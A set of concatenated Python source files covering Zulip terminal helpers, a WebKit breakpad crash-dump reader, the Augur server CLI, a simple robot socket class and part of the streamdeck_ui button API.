    # narrowing down the right user), plus the email address.
    candidates = full_name.split()
    candidates.append(full_name)
    candidates.append(user['email'].lower())
    return any(candidate.startswith(needle) for candidate in candidates)
def match_emoji(emoji: str, text: str) -> bool:
    """
    True if the emoji matches with `text` (case insensitive),
    False otherwise.
    """
    prefix = text.lower()
    return emoji.lower().startswith(prefix)
def match_topics(topic_names: List[str], search_text: str) -> List[str]:
    """Topic names starting with `search_text` (case insensitive)."""
    prefix = search_text.lower()
    return [name for name in topic_names if name.lower().startswith(prefix)]
DataT = TypeVar('DataT')
def match_stream(data: List[Tuple[DataT, str]], search_text: str,
                 pinned_streams: List[StreamData]
                 ) -> Tuple[List[DataT], List[str]]:
    """
    Returns a list of DataT (streams) and a list of their corresponding names
    whose words match with the 'text' in the following order:
    * 1st-word startswith match > 2nd-word startswith match > ... (pinned)
    * 1st-word startswith match > 2nd-word startswith match > ... (unpinned)
    Note: This function expects `data` to be sorted, in a non-decreasing
    order, and ordered by their pinning status.
    """
    pinned_stream_names = [stream['name'] for stream in pinned_streams]
    # Assert that the data is sorted, in a non-decreasing order, and ordered by
    # their pinning status.
    assert data == sorted(sorted(data, key=lambda data: data[1].lower()),
                          key=lambda data: data[1] in pinned_stream_names,
                          reverse=True)
    # Treat '-', '_' and '/' as word separators when splitting stream names.
    delimiters = '-_/'
    trans = str.maketrans(delimiters, len(delimiters) * ' ')
    # Each entry carries the full name plus its 2nd..nth words, so the
    # search text can match the whole name or any later word.
    stream_splits = [
        ((datum, [stream_name] + stream_name.translate(trans).split()[1:]))
        for datum, stream_name in data
    ]
    matches = OrderedDict([
        ('pinned', defaultdict(list)),
        ('unpinned', defaultdict(list)),
    ])  # type: OrderedDict[str, DefaultDict[int, List[Tuple[DataT, str]]]]
    # Bucket every match by (pinned/unpinned, index of the matching word).
    for datum, splits in stream_splits:
        stream_name = splits[0]
        kind = 'pinned' if stream_name in pinned_stream_names else 'unpinned'
        for match_position, word in enumerate(splits):
            if word.lower().startswith(search_text.lower()):
                matches[kind][match_position].append((datum, stream_name))
    # Emit pinned buckets first, earliest matching word position first,
    # skipping duplicates (a stream can match at several positions).
    ordered_matches = []
    ordered_names = []
    for matched_data in matches.values():
        if not matched_data:
            continue
        for match_position in range(max(matched_data.keys()) + 1):
            for datum, name in matched_data.get(match_position, []):
                if datum not in ordered_matches:
                    ordered_matches.append(datum)
                    ordered_names.append(name)
    return ordered_matches, ordered_names
def match_group(group_name: str, text: str) -> bool:
    """
    True if any group name matches with `text` (case insensitive),
    False otherwise.
    """
    lowered = text.lower()
    return group_name.lower().startswith(lowered)
def format_string(names: List[str], wrapping_text: str) -> List[str]:
    """
    Wrap a list of names using the wrapping characters for typeahead.
    """
    wrap = wrapping_text.format
    return [wrap(name) for name in names]
def powerset(iterable: Iterable[Any],
             map_func: Callable[[Any], Any]=set) -> List[Any]:
    """
    Return every subset of `iterable`, each transformed by `map_func`,
    ordered by subset size (smallest first).

    >> powerset([1,2,3])
    returns: [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}]"
    """
    elements = list(iterable)
    # Subsets of every size, empty set up to the full set; the inner name
    # no longer shadows the function, and no intermediate list is built.
    subsets = chain.from_iterable(combinations(elements, size)
                                  for size in range(len(elements) + 1))
    return [map_func(subset) for subset in subsets]
def canonicalize_color(color: str) -> str:
    """
    Given a color of the format '#xxxxxx' or '#xxx', produces one of the
    format '#xxx'. Always produces lowercase hex digits.
    """
    # '#xxxxxx' color, stored by current zulip server: keep the first hex
    # digit of each channel pair. (A match object is truthy iff not None.)
    if match('^#[0-9A-Fa-f]{6}$', color, ASCII):
        return (color[:2] + color[3] + color[5]).lower()
    # '#xxx' color, which may be stored by the zulip server <= 2.0.0
    # (potentially later versions too).
    if match('^#[0-9A-Fa-f]{3}$', color, ASCII):
        return color.lower()
    raise ValueError('Unknown format for color "{}"'.format(color))
def notify(title: str, html_text: str) -> str:
    """
    Show a desktop notification with the plain-text rendering of
    `html_text`. Returns the notifier command name when it could not be
    found, otherwise "".
    """
    text = lxml.html.document_fromstring(html_text).text_content()
    if MACOS:
        command_list = [
            "osascript",
            "-e", "on run(argv)",
            "-e", "return display notification item 1 of argv with title "
                  'item 2 of argv sound name "ZT_NOTIFICATION_SOUND"',
            "-e", "end",
            "--", text, title
        ]
    elif LINUX:
        command_list = ["notify-send", "--", title, text]
    else:
        # No notifier is known for this platform.
        command_list = None
    if command_list is not None:
        try:
            subprocess.run(command_list, stdout=subprocess.DEVNULL,
                           stderr=subprocess.DEVNULL)
        except FileNotFoundError:
            # This likely means the notification command could not be found
            return command_list[0]
    return ""
def display_error_if_present(response: Dict[str, Any], controller: Any
                             ) -> None:
    """Show the server's error message in the footer, if the view exists."""
    if response['result'] != 'error':
        return
    if hasattr(controller, 'view'):
        controller.view.set_footer_text(response['msg'], 3)
def hash_util_decode(string: str) -> str:
    """
    Returns a decoded string given a hash_util_encode() [present in
    zulip/zulip's zerver/lib/url_encoding.py] encoded string.
    """
    # zulip encodes '%' as '.' (zerver/lib/url_encoding.py); restore the
    # percent signs before standard percent-decoding.
    percent_encoded = string.replace('.', '%')
    return unquote(percent_encoded)
def get_unused_fence(content: str) -> str:
    """
    Generate a back-tick fence for a quoted message that is strictly
    longer than any fence already in `content` (minimum length 3).
    Referred and translated from zulip/static/shared/js/fenced_code.js.
    """
    existing = findall('^ {0,3}(`{3,})', content, flags=MULTILINE)
    # With no existing fences, max(3, 2 + 1) keeps the minimum of 3.
    longest = max((len(fence) for fence in existing), default=2)
    return '`' * max(3, longest + 1)
|
dump_reader_multipart.py | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cgi
import logging
import threading
import Queue
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.breakpad.dump_reader import DumpReader
_log = logging.getLogger(__name__)  # module-level logger shared by the dump readers
class DumpReaderMultipart(DumpReader):
    """Base class for Linux and Android breakpad dump reader."""
    def __init__(self, host, build_dir):
        super(DumpReaderMultipart, self).__init__(host, build_dir)
        self._webkit_finder = WebKitFinder(host.filesystem)
        self._breakpad_tools_available = None  # cached result of the tool check
        self._generated_symbols = False        # symbols are generated at most once
    def check_is_functional(self):
        return self._check_breakpad_tools_available()
    def _get_pid_from_dump(self, dump_file):
        # The multipart dump carries the crashed process pid as a form field.
        dump = self._read_dump(dump_file)
        if not dump:
            return None
        if 'pid' in dump:
            return dump['pid'][0]
        return None
    def _get_stack_from_dump(self, dump_file):
        """Extract the minidump part and symbolize it with minidump_stackwalk."""
        dump = self._read_dump(dump_file)
        if not dump:
            return None
        if 'upload_file_minidump' not in dump:
            return None
        self._generate_breakpad_symbols_if_necessary()
        f, temp_name = self._host.filesystem.open_binary_tempfile('dmp')
        f.write("\r\n".join(dump['upload_file_minidump']))
        f.close()
        cmd = [self._path_to_minidump_stackwalk(), temp_name, self._symbols_dir()]
        try:
            stack = self._host.executive.run_command(cmd, return_stderr=False)
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any command failure yields a None stack.
        except Exception:
            _log.warning('Failed to execute "%s"' % ' '.join(cmd))
            stack = None
        finally:
            self._host.filesystem.remove(temp_name)
        return stack
    def _read_dump(self, dump_file):
        """Parse the multipart dump file; returns the field dict or None."""
        with self._host.filesystem.open_binary_file_for_reading(dump_file) as f:
            # The first line is '--<boundary>'; strip the leading dashes.
            boundary = f.readline().strip()[2:]
            f.seek(0)
            try:
                data = cgi.parse_multipart(f, {'boundary': boundary})
                return data
            # Narrowed from a bare `except:`; a malformed dump returns None.
            except Exception:
                pass
        return None
    def _check_breakpad_tools_available(self):
        if self._breakpad_tools_available is not None:
            return self._breakpad_tools_available
        REQUIRED_BREAKPAD_TOOLS = [
            'dump_syms',
            'minidump_stackwalk',
        ]
        result = True
        for binary in REQUIRED_BREAKPAD_TOOLS:
            full_path = self._host.filesystem.join(self._build_dir, binary)
            if not self._host.filesystem.exists(full_path):
                result = False
                _log.error('Unable to find %s' % binary)
                _log.error('    at %s' % full_path)
        if not result:
            _log.error("    Could not find breakpad tools, unexpected crashes won't be symbolized")
            _log.error('    Did you build the target blink_tests?')
            _log.error('')
        self._breakpad_tools_available = result
        return self._breakpad_tools_available
    def _path_to_minidump_stackwalk(self):
        return self._host.filesystem.join(self._build_dir, "minidump_stackwalk")
    def _path_to_generate_breakpad_symbols(self):
        return self._webkit_finder.path_from_chromium_base(
            "components", "crash", "content", "tools", "generate_breakpad_symbols.py")
    def _symbols_dir(self):
        return self._host.filesystem.join(self._build_dir, 'content_shell.syms')
    def _generate_breakpad_symbols_if_necessary(self):
        """Run generate_breakpad_symbols.py once per session for each binary."""
        if self._generated_symbols:
            return
        self._generated_symbols = True
        _log.debug("Generating breakpad symbols")
        # A keepalive thread logs periodically so long symbolization runs
        # don't look hung; it exits once we put an item on the queue.
        queue = Queue.Queue()
        thread = threading.Thread(target=_symbolize_keepalive, args=(queue,))
        thread.start()
        try:
            for binary in self._binaries_to_symbolize():
                _log.debug('  Symbolizing %s' % binary)
                full_path = self._host.filesystem.join(self._build_dir, binary)
                cmd = [
                    self._path_to_generate_breakpad_symbols(),
                    '--binary=%s' % full_path,
                    '--symbols-dir=%s' % self._symbols_dir(),
                    '--build-dir=%s' % self._build_dir,
                ]
                try:
                    self._host.executive.run_command(cmd)
                # Narrowed from a bare `except:`; symbolization failures for
                # one binary shouldn't abort the others.
                except Exception:
                    _log.error('Failed to execute "%s"' % ' '.join(cmd))
        finally:
            queue.put(None)
            thread.join()
        _log.debug("Done generating breakpad symbols")
    def _binaries_to_symbolize(self):
        """This routine must be implemented by subclasses.
        Returns an array of binaries that need to be symbolized."""
        raise NotImplementedError()
def _symbolize_keepalive(queue):
    """Log every 60s until any item arrives on `queue`, then return."""
    while True:
        _log.debug("waiting for symbolize to complete")
        try:
            queue.get(block=True, timeout=60)
        except Queue.Empty:
            continue
        return
class DumpReaderLinux(DumpReaderMultipart):
    """Linux breakpad dump reader."""
    def _binaries_to_symbolize(self):
        # Binaries whose breakpad symbols are needed to symbolize crashes.
        return ['content_shell', 'libtest_netscape_plugin.so', 'libosmesa.so']
    def _file_extension(self):
        # Breakpad minidump files use the .dmp extension.
        return 'dmp'
class DumpReaderAndroid(DumpReaderMultipart):
    """Android breakpad dump reader."""
    def _binaries_to_symbolize(self):
        # Only the content shell library is symbolized on Android.
        return ['lib/libcontent_shell_content_view.so']
    def _file_extension(self):
        # Breakpad minidump files use the .dmp extension.
        return 'dmp'
|
backend.py | #SPDX-License-Identifier: MIT
"""
Augur library commands for controlling the backend components
"""
from copy import deepcopy
import os, time, atexit, subprocess, click, atexit, logging, sys
import psutil
import signal
import multiprocessing as mp
import gunicorn.app.base
from gunicorn.arbiter import Arbiter
from augur.cli import initialize_logging, pass_config, pass_application
from augur.housekeeper import Housekeeper
from augur.server import Server
from augur.application import Application
from augur.gunicorn import AugurGunicornApp
logger = logging.getLogger("augur")
@click.group('server', short_help='Commands for controlling the backend API server & data collection workers')
def cli():
    # Parent command group; subcommands are registered via @cli.command below.
    pass
@cli.command("start")
@click.option("--disable-housekeeper", is_flag=True, default=False, help="Turns off the housekeeper")
@click.option("--skip-cleanup", is_flag=True, default=False, help="Disables the old process cleanup that runs before Augur starts")
@click.option("--logstash", is_flag=True, default=False, help="Runs logstash to collect errors from logs")
@click.option("--logstash-with-cleanup", is_flag=True, default=False, help="Runs logstash to collect errors from logs and cleans all previously collected errors")
def start(disable_housekeeper, skip_cleanup, logstash, logstash_with_cleanup):
    """
    Start Augur's backend server
    """
    augur_app = Application()
    logger.info("Augur application initialized")
    logger.info(f"Using config file: {augur_app.config.config_file_location}")
    if not skip_cleanup:
        # Kill any stale Augur processes left from a previous run.
        logger.debug("Cleaning up old Augur processes...")
        _broadcast_signal_to_processes()
        time.sleep(2)
    else:
        logger.debug("Skipping process cleanup")
    if logstash or logstash_with_cleanup:
        augur_home = os.getenv('ROOT_AUGUR_DIRECTORY', "")
        if logstash_with_cleanup:
            print("Cleaning old workers errors...")
            # Reset the collected-errors page to the empty template.
            with open(augur_home + "/log_analysis/http/empty_index.html") as f:
                lines = f.readlines()
            with open(augur_home + "/log_analysis/http/index.html", "w") as f1:
                f1.writelines(lines)
            print("All previous workers errors got deleted.")
        elasticsearch_path = os.getenv('ELASTIC_SEARCH_PATH', "/usr/local/bin/elasticsearch")
        subprocess.Popen(elasticsearch_path)
        logstash_path = os.getenv('LOGSTASH_PATH', "/usr/local/bin/logstash")
        subprocess.Popen([logstash_path, "-f", augur_home + "/log_analysis/logstash-filter.conf"])
    master = initialize_components(augur_app, disable_housekeeper)
    logger.info('Starting Gunicorn webserver...')
    # Dropped the pointless f-prefix (the string has no placeholders).
    logger.info("Augur is running at: http://0.0.0.0:5000")
    logger.info("Gunicorn server logs & errors will be written to logs/gunicorn.log")
    logger.info('Housekeeper update process logs will now take over.')
    # Blocks for the lifetime of the server.
    Arbiter(master).run()
@cli.command('stop')
@initialize_logging
def stop():
    """
    Sends SIGTERM to all Augur server & worker processes
    """
    # SIGTERM is the default signal of _broadcast_signal_to_processes.
    _broadcast_signal_to_processes(given_logger=logging.getLogger("augur.cli"))
@cli.command('kill')
@initialize_logging
def kill():
    """
    Sends SIGKILL to all Augur server & worker processes
    """
    # SIGKILL cannot be caught or ignored by the target processes.
    _broadcast_signal_to_processes(signal=signal.SIGKILL, given_logger=logging.getLogger("augur.cli"))
@cli.command('processes')
@initialize_logging
def processes():
    """
    Outputs the name/PID of all Augur server & worker processes"""
    # NOTE(review): the local names shadow this function and the module
    # logger; harmless for a CLI leaf command.
    logger = logging.getLogger("augur.cli")
    processes = get_augur_processes()
    for process in processes:
        logger.info(f"Found process {process.pid}")
def get_augur_processes():
    """
    Return psutil.Process objects for every python process running inside
    the same virtualenv as this one, excluding the current process.
    """
    processes = []
    current_venv = os.getenv('VIRTUAL_ENV')
    for process in psutil.process_iter(['cmdline', 'name', 'environ']):
        if process.info['cmdline'] is not None and process.info['environ'] is not None:
            try:
                # BUGFIX: guard against VIRTUAL_ENV being unset — the original
                # `os.getenv(...) in str` raised TypeError (None is not str)
                # when Augur was run outside a virtualenv.
                if (current_venv is not None
                        and current_venv in process.info['environ']['VIRTUAL_ENV']
                        and 'python' in ''.join(process.info['cmdline']).lower()):
                    if process.pid != os.getpid():
                        processes.append(process)
            except KeyError:
                # Process has no VIRTUAL_ENV in its environment; skip it.
                pass
    return processes
def _broadcast_signal_to_processes(signal=signal.SIGTERM, given_logger=None):
    """
    Send `signal` to every Augur process except the current one.

    given_logger lets CLI subcommands route output through their own logger;
    by default the module logger is used.
    """
    _logger = logger if given_logger is None else given_logger
    for process in get_augur_processes():
        if process.pid == os.getpid():
            continue
        # BUGFIX: log via the selected logger — the original called the
        # module-level `logger` here, silently ignoring `given_logger`.
        _logger.info(f"Stopping process {process.pid}")
        try:
            process.send_signal(signal)
        except psutil.NoSuchProcess:
            # Process exited between listing and signalling; nothing to do.
            pass
def initialize_components(augur_app, disable_housekeeper):
    """
    Boot the housekeeper and all configured worker processes, then return
    the Gunicorn app object that will serve the API.
    """
    master = None  # NOTE(review): never reassigned; exit() always receives None
    manager = None
    broker = None
    housekeeper = None
    worker_processes = []
    # forkserver keeps worker processes from inheriting the parent's state.
    mp.set_start_method('forkserver', force=True)
    if not disable_housekeeper:
        manager = mp.Manager()
        # Shared job board between the housekeeper and the workers.
        broker = manager.dict()
        housekeeper = Housekeeper(broker=broker, augur_app=augur_app)
        controller = augur_app.config.get_section('Workers')
        for worker in controller.keys():
            if controller[worker]['switch']:
                for i in range(controller[worker]['workers']):
                    logger.info("Booting {} #{}".format(worker, i + 1))
                    worker_process = mp.Process(target=worker_start, name=f"{worker}_{i}", kwargs={'worker_name': worker, 'instance_number': i, 'worker_port': controller[worker]['port']}, daemon=True)
                    worker_processes.append(worker_process)
                    worker_process.start()
    augur_app.manager = manager
    augur_app.broker = broker
    augur_app.housekeeper = housekeeper
    # atexit._clear() is a private CPython API: it wipes handlers registered
    # by imported libraries so only our exit() below runs on shutdown.
    atexit._clear()
    atexit.register(exit, augur_app, worker_processes, master)
    return AugurGunicornApp(augur_app.gunicorn_options, augur_app=augur_app)
def worker_start(worker_name=None, instance_number=0, worker_port=None):
    """Launch one data-collection worker via its `<name>_start` entry point."""
    try:
        # Stagger worker boots 30s apart so they don't stampede the broker.
        time.sleep(30 * instance_number)
        destination = subprocess.DEVNULL
        # NOTE(review): shell=True with an interpolated worker name; names
        # come from the local config file and are assumed trusted.
        process = subprocess.Popen("cd workers/{} && {}_start".format(worker_name,worker_name), shell=True, stdout=destination, stderr=subprocess.STDOUT)
        logger.info("{} #{} booted.".format(worker_name,instance_number+1))
    except KeyboardInterrupt as e:
        pass
def exit(augur_app, worker_processes, master):
    """Shut down the app, terminate worker processes, and halt Gunicorn.

    Registered with atexit; the name intentionally matches that registration
    even though it shadows the ``exit`` builtin.
    """
    logger.info("Shutdown started for this Gunicorn worker...")
    augur_app.shutdown()
    for child in (worker_processes or []):
        logger.debug("Shutting down worker process with pid: {}...".format(child.pid))
        child.terminate()
    if master is not None:
        logger.debug("Shutting down Gunicorn server")
        master.halt()
    logger.info("Shutdown complete")
    sys.exit(0)
|
Communicate.py | import socket
from collections import deque
from threading import Thread, Event
# TODO - fix how the connection closes.
class Communicate(object):
    """Minimal TCP message line between a robot server and a client.

    Call ``setupLine("")`` on the listening side (e.g. the Raspberry Pi) or
    ``setupLine(host)`` on the connecting side, then exchange UTF-8 strings
    via ``sendMessage`` and the ``inbox`` deque.
    """

    def __init__(self):
        self.address = ""
        self.port = 5580
        self.finished = False  # flipped True once the peer disconnects
        self.inbox = deque()   # received messages, newest appended on the left
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.getMessagesThread = Thread(target=self.getMessages)
        self.getMessagesThread.daemon = True
        self.e = Event()
        print(self.address)
        return

    def setupLine(self, addr):
        """Bind-and-accept when *addr* is empty, otherwise connect to *addr*."""
        self.address = addr
        # Bug fix: the original tested ``self.address is ""`` — identity
        # comparison against a string literal is implementation-dependent
        # and breaks for any non-interned empty string. Use equality.
        if self.address == "":  # i.e. server on raspberry pi
            try:
                self.connection.bind((self.address, self.port))
                self.connection.listen(1)
                # Replace the listening socket with the accepted connection.
                self.connection, otherAddress = self.connection.accept()
                print("connected to: " + otherAddress[0])
            except socket.error as msg:
                print(msg)
        else:
            self.connection.connect((self.address, self.port))  # i.e. client
        self.getMessagesThread.start()
        return

    def sendMessage(self, msg):
        """Encode *msg* to bytes and send it over the connection."""
        self.connection.send(str.encode(msg))
        return

    def getMessages(self):
        """Background loop: decode incoming data and queue it on ``inbox``."""
        while not self.finished:
            received = self.connection.recv(1024)
            decoded = received.decode('utf-8')
            if len(decoded) > 0:
                if decoded == "connection closed.":
                    print("connection closed.")
                if decoded == "client disconnected.":
                    self.finished = True
                else:
                    self.inbox.appendleft(decoded)
        return

    def closeConnection(self):
        """Stop the reader thread and close the socket."""
        self.finished = True
        self.e.set()
        self.getMessagesThread.join()
        self.connection.close()
        return
# EXAMPLE CASES
##if(__name__ == "__main__"):
## robotClient = Communicate()
## robotClient.setupLine("127.0.0.1")
## while(True):
## val = input("enter something: ")
## robotClient.sendMessage(val)
##if(__name__ == "__main__"):
## try:
## robotServer = Communicate()
## print("waiting for client to connect...")
## robotServer.setupLine("")
## print("connected!")
## while(True):
## if(len(robotServer.inbox) > 0):
## print(robotServer.inbox.pop())
## if(robotServer.finished):
## break
## #robotServer.closeConnection()
## except:
## pass
## finally:
## robotServer.closeConnection()
|
api.py | """Defines the Python API for interacting with the StreamDeck Configuration UI"""
import json
import os
import threading
from functools import partial
from subprocess import Popen # nosec - Need to allow users to specify arbitrary commands
from typing import Dict, List, Tuple, Union
from warnings import warn
from PIL import Image, ImageDraw, ImageFont
from pynput.keyboard import Controller, Key
from StreamDeck import DeviceManager, ImageHelpers
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
live_functions: List = []
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
    """Dispatch every action configured for *key* when it is pressed.

    Installed as the StreamDeck library's key callback; ``state`` is True on
    press and False on release (releases are ignored).
    """
    if state:
        keyboard = Controller()
        page = get_page(deck_id)
        command = get_button_command(deck_id, page, key)
        if command:
            # NOTE(review): naive whitespace split — quoted arguments that
            # contain spaces will be broken apart incorrectly.
            Popen(command.split(" "))
        keys = get_button_keys(deck_id, page, key)
        if keys:
            keys = keys.strip().replace(" ", "")
            # "a+b,c" means: press a and b together, release, then press c.
            for section in keys.split(","):
                for key_name in section.split("+"):
                    # Named keys resolve via pynput's Key enum; anything else
                    # is typed as a literal character.
                    keyboard.press(getattr(Key, key_name.lower(), key_name))
                for key_name in section.split("+"):
                    keyboard.release(getattr(Key, key_name.lower(), key_name))
        write = get_button_write(deck_id, page, key)
        if write:
            keyboard.type(write)
        brightness_change = get_button_change_brightness(deck_id, page, key)
        if brightness_change:
            change_brightness(deck_id, brightness_change)
        switch_page = get_button_switch_page(deck_id, page, key)
        if switch_page:
            # Stored 1-based in the config; pages are 0-based internally.
            set_page(deck_id, switch_page - 1)
def _save_state():
    """Persist the in-memory configuration to the default state file."""
    export_config(STATE_FILE)
def _open_config(config_file: str):
    """Load *config_file* into the module-level ``state`` dict.

    Args:
        config_file: Path to a JSON state file written by ``export_config``.

    Raises:
        ValueError: If the file's version does not match CONFIG_FILE_VERSION.
    """
    global state

    with open(config_file) as state_file:
        # Idiom fix: json.load consumes the file object directly instead of
        # the original json.loads(state_file.read()).
        config = json.load(state_file)

    file_version = config.get("streamdeck_ui_version", 0)
    if file_version != CONFIG_FILE_VERSION:
        raise ValueError(
            "Incompatible version of config file found: "
            f"{file_version} does not match required version "
            f"{CONFIG_FILE_VERSION}."
        )

    state = {}
    for deck_id, deck in config["state"].items():
        # JSON object keys are strings; page and button ids are ints in memory.
        deck["buttons"] = {
            int(page_id): {int(button_id): button for button_id, button in buttons.items()}
            for page_id, buttons in deck.get("buttons", {}).items()
        }
        state[deck_id] = deck
def import_config(config_file: str) -> None:
    """Replace the current configuration with *config_file*, re-render all
    decks, and persist the imported settings as the new saved state."""
    _open_config(config_file)
    render()
    _save_state()
def export_config(output_file: str) -> None:
    """Serialize the current configuration to *output_file* as pretty JSON."""
    with open(output_file, "w") as state_file:
        payload = json.dumps(
            {"streamdeck_ui_version": CONFIG_FILE_VERSION, "state": state},
            indent=4,
            separators=(",", ": "),
        )
        state_file.write(payload)
def open_decks() -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
    """Opens and then returns all known stream deck devices"""
    for deck in DeviceManager.DeviceManager().enumerate():
        deck.open()
        deck.reset()
        deck_id = deck.get_serial_number()
        decks[deck_id] = deck
        # Bind the serial into the callback so handlers know which deck fired.
        deck.set_key_callback(partial(_key_change_callback, deck_id))
    return {
        deck_id: {"type": deck.deck_type(), "layout": deck.key_layout()}
        for deck_id, deck in decks.items()
    }
def ensure_decks_connected() -> None:
    """Reconnects to any decks that lost connection. If they did, re-renders them."""
    # Iterate a copy: the loop mutates ``decks`` when it rebinds a serial.
    for deck_serial, deck in decks.copy().items():
        if not deck.connected():
            for new_deck in DeviceManager.DeviceManager().enumerate():
                try:
                    new_deck.open()
                    new_deck_serial = new_deck.get_serial_number()
                except Exception as error:
                    warn(f"A {error} error occurred when trying to reconnect to {deck_serial}")
                    new_deck_serial = None
                # NOTE(review): decks that were opened but did not match
                # deck_serial are never closed here — possible handle leak
                # when multiple decks are attached. Confirm against upstream.
                if new_deck_serial == deck_serial:
                    deck.close()
                    new_deck.reset()
                    new_deck.set_key_callback(partial(_key_change_callback, new_deck_serial))
                    decks[new_deck_serial] = new_deck
                    render()
def get_deck(deck_id: str) -> Dict[str, Dict[str, Union[str, Tuple[int, int]]]]:
    """Describe one connected deck by its hardware type and key layout."""
    deck = decks[deck_id]
    return {"type": deck.deck_type(), "layout": deck.key_layout()}
def _button_state(deck_id: str, page: int, button: int) -> dict:
    """Return (creating on demand) the mutable settings dict for one button."""
    deck_state = state.setdefault(deck_id, {})
    pages = deck_state.setdefault("buttons", {})  # type: ignore
    page_state = pages.setdefault(page, {})
    return page_state.setdefault(button, {})  # type: ignore
class LiveFunction:
    """A periodically re-evaluated callable bound to one deck button."""

    def __init__(self, deck_id: str, page: int, button: int, function_to_run, args):
        self.deck_id = deck_id
        self.page = page
        self.button = button
        self.function = function_to_run
        self.function_args = args

    def _identity(self):
        # Everything that participates in equality, as a single tuple.
        return (self.deck_id, self.page, self.button, self.function, self.function_args)

    def __eq__(self, other):
        # Robustness fix: the original dereferenced ``other.deck_id``
        # unconditionally, so comparing against any non-LiveFunction raised
        # AttributeError. Defer to the other operand instead.
        if not isinstance(other, LiveFunction):
            return NotImplemented
        return self._identity() == other._identity()

    def __hash__(self):
        # Hash only the button coordinates (original contract): equal objects
        # share a hash; distinct functions on the same button may collide.
        return hash(f"{self.deck_id}{self.page}{self.button}")

    def remove_all_from_btn(self):
        """Deregister every live function attached to this button."""
        lf_to_remove = [
            live_function
            for live_function in live_functions
            if self.deck_id == live_function.deck_id
            and self.page == live_function.page
            and self.button == live_function.button
        ]
        for lf in lf_to_remove:
            live_functions.remove(lf)

    def btn_has_diff_function_running(self):
        """True if this button already runs a different function (or args)."""
        return any(
            self.deck_id == f.deck_id
            and self.page == f.page
            and self.button == f.button
            and (self.function != f.function or self.function_args != f.function_args)
            for f in live_functions
        )
def _set_button_live_info(deck_id: str, page: int, button: int, start: bool, func, *args):
    """Register (or deregister) *func* as the live-text updater for a button.

    Args:
        start: True to start live updates, False to stop them and clear text.
        func: Callable producing the text to display on each tick.
        *args: Arguments bundle forwarded to *func* on every tick.
    """
    # Fix: removed the redundant function-local ``import threading`` — the
    # module already imports threading at the top of the file.
    live_function = LiveFunction(deck_id, page, button, func, *args)

    if not start:
        live_function.remove_all_from_btn()
        # Clear Text
        set_button_info(deck_id, page, button, "")
        return

    # A different function on the same button replaces the old one.
    if live_function.btn_has_diff_function_running():
        live_function.remove_all_from_btn()

    # Already registered, skip and carry on
    if live_function in live_functions:
        return

    live_functions.append(live_function)

    # Ensure we don't kick off multiple threads at once
    thread_name = "live_updater"
    if any(thread.name == thread_name for thread in threading.enumerate()):
        return

    thread = threading.Thread(name=thread_name, target=_start_live_updater)
    thread.daemon = True
    thread.start()
def set_button_live_time(deck_id: str, page: int, button: int, start: bool) -> None:
    """Set the button to display live time every second"""
    # start=False deregisters the updater and clears the button text.
    _set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H:%M:%S"])
def _get_current_time(date_format: str):
from datetime import datetime
return datetime.now().strftime(date_format)
def set_button_live_hour(deck_id: str, page: int, button: int, start: bool) -> None:
    """Set the button to display the current hour"""
    # Set Font
    # Large font, since the label is only two characters wide.
    _button_state(deck_id, page, button)["font_size"] = 48
    _set_button_live_info(deck_id, page, button, start, _get_current_time, ["%H"])
def set_button_live_minute(deck_id: str, page: int, button: int, start: bool) -> None:
    """Set the button to display the current minute"""
    # Large font, since the label is only two characters wide.
    _button_state(deck_id, page, button)["font_size"] = 48
    _set_button_live_info(deck_id, page, button, start, _get_current_time, ["%M"])
def _start_live_updater():
    """Worker loop: refresh every registered live button once per second.

    Runs on the dedicated "live_updater" thread and exits once the last live
    function has been deregistered.
    """
    import time

    while len(live_functions) > 0:
        # Fix: iterate a snapshot — other threads deregister entries via
        # remove_all_from_btn(), and mutating a list while iterating it
        # skips elements or raises at runtime.
        for live_function in list(live_functions):
            result = live_function.function(*live_function.function_args)
            set_button_info(live_function.deck_id, live_function.page, live_function.button, result)
        time.sleep(1)
def set_button_text(deck_id: str, page: int, button: int, text: str) -> None:
    """Store *text* for a button, invalidate its cached image, and redraw."""
    button_cfg = _button_state(deck_id, page, button)
    button_cfg["text"] = text
    # The cached image no longer matches the new text.
    image_cache.pop(f"{deck_id}.{page}.{button}", None)
    render()
    _save_state()


